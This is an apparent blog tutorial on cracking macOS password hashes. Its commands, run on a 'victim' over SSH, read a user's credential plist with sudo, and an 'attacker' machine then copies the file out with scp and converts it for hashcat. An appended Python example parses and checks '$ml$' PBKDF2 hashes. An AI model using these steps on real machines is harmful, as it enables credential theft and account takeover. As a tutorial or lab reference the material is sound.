How do we crack OS X password hashes?
I haven’t had tea but I was thinking about the Mac I was remoting into and I suddenly thought... I wonder how to crack the hashes from a Mac. Surely it’s just cat /etc/passwd and cat /etc/shadow and then unshadow and run hashcat, right?
The hashes for local users are stored here:
There is a .plist file per [username], e.g. for user “user” we would do the following:
sudo cat /var/db/dslocal/nodes/Default/users/user.plist
The file format is XML and is a “Property List” file type:
We need to extract the hash, there are two tools for this:
hashcat mode: 7100
macOS v10.8+ (PBKDF2-SHA512)
Example hash: $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222
If you want to follow along but you don’t have a Mac, don’t worry:
#From SSH on the victim
sudo cat /var/db/dslocal/nodes/Default/users/user.plist
sudo cp /var/db/dslocal/nodes/Default/users/user.plist /Users/user/Desktop/user.plist
sudo chown user:staff /Users/user/Desktop/user.plist
#From Attacker KALI/Linux/whatever machine
scp [email protected]:/Users/user/Desktop/user.plist ./
wget https://gist.githubusercontent.com/nueh/8252572/raw/1c5992fccf093dcce13572c6980176864edaf816/plist2hashcat.py
chmod +x plist2hashcat.py
python2 ./plist2hashcat.py user.plist
user:$ml$73529$7331440ead78f9e9567de0f4be67558615e8e1dc3b40d9ac30a0fc26c5dd1d26$2fc1cde58115106f369d44d06ff9f8bd91c4d487bd382d6d110e18a2ab217bd4150ff26d12148ae43fbe04cc7cb67434afad454c4134c7db68e0d0f7c8519bf8
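The `$ml$` lines above (the hashcat example hash and the `user:$ml$...` output of plist2hashcat.py) taken apart field by field, as an added example that is not code from this post or from plist2hashcat.py. It assumes the mode 7100 layout of a decimal iteration count, a hex salt and the first 64 bytes of the PBKDF2-HMAC-SHA512 output in hex; the function names and the test password are constructed for illustration.

```python
import hashlib
import hmac
from typing import NamedTuple

# Example hash quoted on this page for hashcat mode 7100.
PAGE_EXAMPLE = ("$ml$35460"
                "$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05"
                "$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f"
                "96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222")

class MlHash(NamedTuple):
    iterations: int      # PBKDF2 rounds: the per-guess cost
    salt: bytes          # random per-account salt
    derived_key: bytes   # first 64 bytes of the PBKDF2-HMAC-SHA512 output

def parse_ml_hash(line: str) -> MlHash:
    """Parse '$ml$<iterations>$<salt hex>$<key hex>'; a 'user:' prefix is allowed."""
    _, marker, body = line.strip().rpartition("$ml$")
    fields = body.split("$")
    if not marker or len(fields) != 3:
        raise ValueError("not a $ml$ hash line")
    iterations = int(fields[0])
    salt, key = bytes.fromhex(fields[1]), bytes.fromhex(fields[2])
    if iterations < 1 or not salt or len(key) != 64:
        raise ValueError("malformed $ml$ fields")
    return MlHash(iterations, salt, key)

def derive(password: str, salt: bytes, iterations: int) -> bytes:
    return hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"),
                               salt, iterations, dklen=64)

def format_ml_hash(password: str, salt: bytes, iterations: int) -> str:
    """Build a $ml$ line for a known password (e.g. a lab test account)."""
    return f"$ml${iterations}${salt.hex()}${derive(password, salt, iterations).hex()}"

def matches(password: str, h: MlHash) -> bool:
    """Re-derive the key with the stored salt and rounds, compare in constant time."""
    return hmac.compare_digest(derive(password, h.salt, h.iterations), h.derived_key)

# Constructed sample: fixed salt and a made-up password, not taken from any system.
CONSTRUCTED = format_ml_hash("correct horse", bytes(range(32)), 40000)

if __name__ == "__main__":
    for label, line in (("page example", PAGE_EXAMPLE), ("constructed", "user:" + CONSTRUCTED)):
        h = parse_ml_hash(line)
        print(f"{label}: {h.iterations} rounds, {len(h.salt)}-byte salt, "
              f"{len(h.derived_key)}-byte key")
    print("constructed password matches:", matches("correct horse", parse_ml_hash(CONSTRUCTED)))
```

Every candidate password costs one full PBKDF2 run at the stored iteration count, so that count and the password's strength decide how long a recovered hash holds up.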